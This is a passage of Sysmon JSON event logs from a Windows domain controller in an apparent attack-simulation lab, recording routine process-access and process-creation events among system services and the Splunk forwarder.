{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3119,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.308\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.308","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3120,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.308\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-0010A21B0500}\r\nSourceProcessId: 4132\r\nSourceThreadId: 3384\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010C61C0500}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.308","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-0010A21B0500}","SourceProcessId":"4132","SourceThreadId":"3384","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010C61C0500}","TargetProcessId":"2988","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3121,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.308\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1124\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.308","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"1124","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3122,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nTargetProcessId: 2768\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","TargetProcessId":"2768","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3123,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3124,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.333\r\nProcessGuid: {A837DB8D-0239-5F25-0000-0010291F0500}\r\nProcessId: 2756\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.333","ProcessGuid":"{A837DB8D-0239-5F25-0000-0010291F0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3125,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 4232\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010291F0500}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7d48|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"4232","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010291F0500}","TargetProcessId":"2756","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7d48|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3126,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010291F0500}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010291F0500}","TargetProcessId":"2756","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3127,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3128,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C